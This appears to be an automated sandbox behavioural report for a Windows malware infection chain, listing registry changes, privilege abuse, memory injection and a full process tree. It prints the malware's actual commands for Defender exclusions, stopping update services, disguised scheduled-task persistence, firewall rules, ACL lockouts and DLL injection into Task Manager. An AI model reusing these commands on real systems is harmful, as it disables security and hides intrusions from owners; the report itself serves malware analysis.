windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2792 = "Novosibirsk Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs mstsca.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople mstsca.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2752 = "Tomsk Standard Time" windefender.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4676 a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271.exe 4676 a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271.exe 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1792 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 636 Process not Found -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 4676 a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271.exe 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 1792 Explorer.EXE 3828 1D5.exe 1668 bewehsf -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1792 Explorer.EXE Token: SeCreatePagefilePrivilege 1792 Explorer.EXE Token: SeShutdownPrivilege 1792 Explorer.EXE Token: SeCreatePagefilePrivilege 1792 Explorer.EXE Token: SeShutdownPrivilege 1792 Explorer.EXE Token: SeCreatePagefilePrivilege 1792 Explorer.EXE Token: SeShutdownPrivilege 1792 Explorer.EXE Token: SeCreatePagefilePrivilege 1792 Explorer.EXE Token: SeShutdownPrivilege 1792 Explorer.EXE Token: SeCreatePagefilePrivilege 1792 Explorer.EXE Token: SeShutdownPrivilege 1792 Explorer.EXE Token: SeCreatePagefilePrivilege 1792 Explorer.EXE Token: SeShutdownPrivilege 1792 Explorer.EXE Token: SeCreatePagefilePrivilege 1792 Explorer.EXE Token: SeShutdownPrivilege 1792 Explorer.EXE Token: SeCreatePagefilePrivilege 1792 Explorer.EXE Token: SeShutdownPrivilege 1792 Explorer.EXE Token: SeCreatePagefilePrivilege 1792 Explorer.EXE Token: SeShutdownPrivilege 1792 Explorer.EXE Token: SeCreatePagefilePrivilege 1792 Explorer.EXE Token: SeShutdownPrivilege 1792 Explorer.EXE Token: SeCreatePagefilePrivilege 1792 Explorer.EXE Token: SeShutdownPrivilege 1792 Explorer.EXE Token: SeCreatePagefilePrivilege 1792 Explorer.EXE Token: SeShutdownPrivilege 1792 Explorer.EXE Token: SeCreatePagefilePrivilege 1792 Explorer.EXE Token: SeDebugPrivilege 4320 powershell.exe Token: SeShutdownPrivilege 1792 Explorer.EXE Token: SeCreatePagefilePrivilege 1792 Explorer.EXE Token: SeShutdownPrivilege 1792 Explorer.EXE Token: SeCreatePagefilePrivilege 1792 Explorer.EXE Token: SeDebugPrivilege 308 AppLaunch.exe Token: SeDebugPrivilege 4188 powershell.exe Token: SeDebugPrivilege 3428 powershell.exe Token: SeDebugPrivilege 2788 AppLaunch.exe Token: SeShutdownPrivilege 1792 Explorer.EXE Token: SeCreatePagefilePrivilege 1792 Explorer.EXE Token: SeShutdownPrivilege 1792 Explorer.EXE Token: SeCreatePagefilePrivilege 1792 Explorer.EXE Token: SeDebugPrivilege 3872 powershell.exe Token: SeShutdownPrivilege 1792 Explorer.EXE Token: SeCreatePagefilePrivilege 1792 Explorer.EXE Token: SeIncreaseQuotaPrivilege 3872 powershell.exe Token: SeSecurityPrivilege 3872 powershell.exe Token: SeTakeOwnershipPrivilege 3872 powershell.exe Token: SeLoadDriverPrivilege 3872 powershell.exe Token: SeSystemProfilePrivilege 3872 powershell.exe Token: SeSystemtimePrivilege 3872 powershell.exe Token: SeProfSingleProcessPrivilege 3872 powershell.exe Token: SeIncBasePriorityPrivilege 3872 powershell.exe Token: SeCreatePagefilePrivilege 3872 powershell.exe Token: SeBackupPrivilege 3872 powershell.exe Token: SeRestorePrivilege 3872 powershell.exe Token: SeShutdownPrivilege 3872 powershell.exe Token: SeDebugPrivilege 3872 powershell.exe Token: SeSystemEnvironmentPrivilege 3872 powershell.exe Token: SeRemoteShutdownPrivilege 3872 powershell.exe Token: SeUndockPrivilege 3872 powershell.exe Token: SeManageVolumePrivilege 3872 powershell.exe Token: 33 3872 powershell.exe Token: 34 3872 powershell.exe Token: 35 3872 powershell.exe Token: 36 3872 powershell.exe Token: SeShutdownPrivilege 1792 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1792 wrote to memory of 4616 1792 Explorer.EXE 70 PID 1792 wrote to memory of 4616 1792 Explorer.EXE 70 PID 1792 wrote to memory of 4616 1792 Explorer.EXE 70 PID 4616 wrote to memory of 4420 4616 ED7D.exe 71 PID 4616 wrote to memory of 4420 4616 ED7D.exe 71 PID 4616 wrote to memory of 4420 4616 ED7D.exe 71 PID 4616 wrote to memory of 4420 4616 ED7D.exe 71 PID 4616 wrote to memory of 4420 4616 ED7D.exe 71 PID 4616 wrote to memory of 4420 4616 ED7D.exe 71 PID 4616 wrote to memory of 4420 4616 ED7D.exe 71 PID 4616 wrote to memory of 4420 4616 ED7D.exe 71 PID 4616 wrote to memory of 4420 4616 ED7D.exe 71 PID 4616 wrote to memory of 4420 4616 ED7D.exe 71 PID 1792 wrote to memory of 4320 1792 Explorer.EXE 72 PID 1792 wrote to memory of 4320 1792 Explorer.EXE 72 PID 1792 wrote to memory of 4320 1792 Explorer.EXE 72 PID 1792 wrote to memory of 1256 1792 Explorer.EXE 73 PID 1792 wrote to memory of 1256 1792 Explorer.EXE 73 PID 1792 wrote to memory of 1256 1792 Explorer.EXE 73 PID 1792 wrote to memory of 604 1792 Explorer.EXE 75 PID 1792 wrote to memory of 604 1792 Explorer.EXE 75 PID 604 wrote to memory of 3848 604 regsvr32.exe 76 PID 604 wrote to memory of 3848 604 regsvr32.exe 76 PID 604 wrote to memory of 3848 604 regsvr32.exe 76 PID 1256 wrote to memory of 308 1256 F520.exe 77 PID 1256 wrote to memory of 308 1256 F520.exe 77 PID 1256 wrote to memory of 308 1256 F520.exe 77 PID 1256 wrote to memory of 308 1256 F520.exe 77 PID 1256 wrote to memory of 308 1256 F520.exe 77 PID 1256 wrote to memory of 308 1256 F520.exe 77 PID 1256 wrote to memory of 308 1256 F520.exe 77 PID 1256 wrote to memory of 308 1256 F520.exe 77 PID 1792 wrote to memory of 2292 1792 Explorer.EXE 79 PID 1792 wrote to memory of 2292 1792 Explorer.EXE 79 PID 1792 wrote to memory of 2292 1792 Explorer.EXE 79 PID 2292 wrote to memory of 4492 2292 FC56.exe 81 PID 2292 wrote to memory of 4492 2292 FC56.exe 81 PID 2292 wrote to memory of 4492 2292 FC56.exe 81 PID 4492 wrote to memory of 2468 4492 yiueea.exe 82 PID 4492 wrote to memory of 2468 4492 yiueea.exe 82 PID 4492 wrote to memory of 2468 4492 yiueea.exe 82 PID 4492 wrote to memory of 360 4492 yiueea.exe 83 PID 4492 wrote to memory of 360 4492 yiueea.exe 83 PID 4492 wrote to memory of 360 4492 yiueea.exe 83 PID 1792 wrote to memory of 3828 1792 Explorer.EXE 85 PID 1792 wrote to memory of 3828 1792 Explorer.EXE 85 PID 1792 wrote to memory of 3828 1792 Explorer.EXE 85 PID 360 wrote to memory of 3192 360 cmd.exe 105 PID 360 wrote to memory of 3192 360 cmd.exe 105 PID 360 wrote to memory of 3192 360 cmd.exe 105 PID 360 wrote to memory of 4728 360 cmd.exe 88 PID 360 wrote to memory of 4728 360 cmd.exe 88 PID 360 wrote to memory of 4728 360 cmd.exe 88 PID 1792 wrote to memory of 3600 1792 Explorer.EXE 89 PID 1792 wrote to memory of 3600 1792 Explorer.EXE 89 PID 1792 wrote to memory of 3600 1792 Explorer.EXE 89 PID 360 wrote to memory of 5080 360 cmd.exe 186 PID 360 wrote to memory of 5080 360 cmd.exe 186 PID 360 wrote to memory of 5080 360 cmd.exe 186 PID 4492 wrote to memory of 4692 4492 yiueea.exe 92 PID 4492 wrote to memory of 4692 4492 yiueea.exe 92 PID 4492 wrote to memory of 4692 4492 yiueea.exe 92 PID 1792 wrote to memory of 4428 1792 Explorer.EXE 91 PID 1792 wrote to memory of 4428 1792 Explorer.EXE 91 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Users\Admin\AppData\Local\Temp\a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271.exe"C:\Users\Admin\AppData\Local\Temp\a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4676
-
-
C:\Users\Admin\AppData\Local\Temp\ED7D.exeC:\Users\Admin\AppData\Local\Temp\ED7D.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Users\Admin\AppData\Local\Temp\ED7D.exeC:\Users\Admin\AppData\Local\Temp\ED7D.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4420 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\54b9847a-dfce-46fb-8324-df75c65cd976" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
PID:3192
-
-
C:\Users\Admin\AppData\Local\Temp\ED7D.exe"C:\Users\Admin\AppData\Local\Temp\ED7D.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3188 -
C:\Users\Admin\AppData\Local\Temp\ED7D.exe"C:\Users\Admin\AppData\Local\Temp\ED7D.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
PID:4400 -
C:\Users\Admin\AppData\Local\892c6b37-e970-434c-82bf-0d6c8d60653e\build2.exe"C:\Users\Admin\AppData\Local\892c6b37-e970-434c-82bf-0d6c8d60653e\build2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1140 -
C:\Users\Admin\AppData\Local\892c6b37-e970-434c-82bf-0d6c8d60653e\build2.exe"C:\Users\Admin\AppData\Local\892c6b37-e970-434c-82bf-0d6c8d60653e\build2.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:5032 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 17128⤵
- Program crash
PID:3528
-
-
-
-
C:\Users\Admin\AppData\Local\892c6b37-e970-434c-82bf-0d6c8d60653e\build3.exe"C:\Users\Admin\AppData\Local\892c6b37-e970-434c-82bf-0d6c8d60653e\build3.exe"6⤵PID:2780
-
C:\Users\Admin\AppData\Local\892c6b37-e970-434c-82bf-0d6c8d60653e\build3.exe"C:\Users\Admin\AppData\Local\892c6b37-e970-434c-82bf-0d6c8d60653e\build3.exe"7⤵
- Executes dropped EXE
PID:4352 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"8⤵
- Creates scheduled task(s)
PID:4312
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\F1C3.exeC:\Users\Admin\AppData\Local\Temp\F1C3.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4320 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
-
C:\Users\Admin\AppData\Local\Temp\F520.exeC:\Users\Admin\AppData\Local\Temp\F520.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:308 -
C:\Users\Admin\AppData\Local\Temp\mi.exe"C:\Users\Admin\AppData\Local\Temp\mi.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
PID:1380
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1256 -s 1403⤵
- Program crash
PID:3416
-
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\F86D.dll2⤵
- Suspicious use of WriteProcessMemory
PID:604 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\F86D.dll3⤵
- Loads dropped DLL
PID:3848
-
-
-
C:\Users\Admin\AppData\Local\Temp\FC56.exeC:\Users\Admin\AppData\Local\Temp\FC56.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe"C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F4⤵
- Creates scheduled task(s)
PID:2468
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit4⤵
- Suspicious use of WriteProcessMemory
PID:360 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:3192
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "yiueea.exe" /P "Admin:N"5⤵PID:4728
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "yiueea.exe" /P "Admin:R" /E5⤵PID:5080
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\577f58beff" /P "Admin:N"5⤵PID:4084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:3020
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\577f58beff" /P "Admin:R" /E5⤵PID:660
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4692 -
C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe"5⤵
- Executes dropped EXE
PID:4992
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe"C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe"4⤵
- Executes dropped EXE
PID:2952 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3428
-
-
C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe"C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe"5⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:2780 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4588
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:3208
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:4848
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1996
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3648
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1524 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4928
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
PID:1192
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f7⤵PID:236
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:2008
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:512
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll7⤵
- Executes dropped EXE
PID:3656
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
PID:1860
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"7⤵
- Executes dropped EXE
PID:3428 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵PID:3240
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵
- Launches sc.exe
PID:3312
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000116001\latestX.exe"C:\Users\Admin\AppData\Local\Temp\1000116001\latestX.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:1164
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1D5.exeC:\Users\Admin\AppData\Local\Temp\1D5.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3828
-
-
C:\Users\Admin\AppData\Local\Temp\C94.exeC:\Users\Admin\AppData\Local\Temp\C94.exe2⤵
- Executes dropped EXE
PID:3600 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4188
-
-
C:\Users\Admin\AppData\Local\Temp\C94.exe"C:\Users\Admin\AppData\Local\Temp\C94.exe"3⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
PID:4712 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:2688
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵PID:508
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:4064
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:2096
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4320
-
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:4428
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:4152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3872
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:3460
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:808
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4760
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4468
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3644
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2824
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:520
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4136
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:3076
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:2152
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:964
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:3028
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:4976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:316
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3076
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5068
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:760
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1716
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4152
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3848
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4384
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3656
-
-
-
